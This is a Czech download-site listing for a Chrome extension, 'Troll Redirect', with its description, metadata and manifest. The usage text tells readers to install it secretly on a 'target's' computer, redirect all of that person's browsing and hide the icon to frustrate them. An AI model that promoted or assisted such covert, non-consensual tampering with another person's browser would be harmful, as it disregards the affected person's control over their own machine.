Troll Redirect

Redirect all of your friend's webpages automatically by installing this on their computer!

Co je Troll Redirect?

Troll Redirect je rozšíření Chrome vyvinuté Aaron Lockhart, a jeho hlavní funkcí je „Redirect all of your friend's webpages automatically by installing this on their computer!“.

Snímky obrazovky rozšíření

screenshot

Stáhnout soubor CRX rozšíření Troll Redirect

Stáhněte si soubory rozšíření Troll Redirect ve formátu crx, ručně nainstalujte rozšíření Chrome do prohlížeče nebo sdílejte soubory crx s přáteli, abyste jednoduše nainstalovali rozšíření Chrome.

Pokyny pro Použití Rozšíření

                        Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.                    

Základní Informace o Rozšíření

Název Troll Redirect Troll Redirect
ID micldaecbnddhhcaojamonojfdffegph
Oficiální URL https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph
Popis Redirect all of your friend's webpages automatically by installing this on their computer!
Velikost souboru 949 KB
Počet instalací 192
Aktuální Verze 1.0
Poslední Aktualizace 2018-12-06
Datum Vydání 2018-12-02
Hodnocení 4.75/5 Celkem 4 Hodnocení
Vývojář Aaron Lockhart
E-mail [email protected]
Typ Platby free
Podporované Jazyky en
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "name": "Troll Redirect",
    "version": "1.0",
    "description": "Redirect all of your friend's webpages automatically by installing this on their computer!",
    "manifest_version": 2,
    "author": "Aaron Lockhart",
    "permissions": [
        "tabs",
        "storage"
    ],
    "content_scripts": [
        {
            "matches": [
                "*:\/\/*\/*"
            ],
            "js": [
                "\/src\/troll.js"
            ],
            "run_at": "document_end"
        }
    ],
    "browser_action": {
        "default_popup": "\/src\/popup.html"
    }
}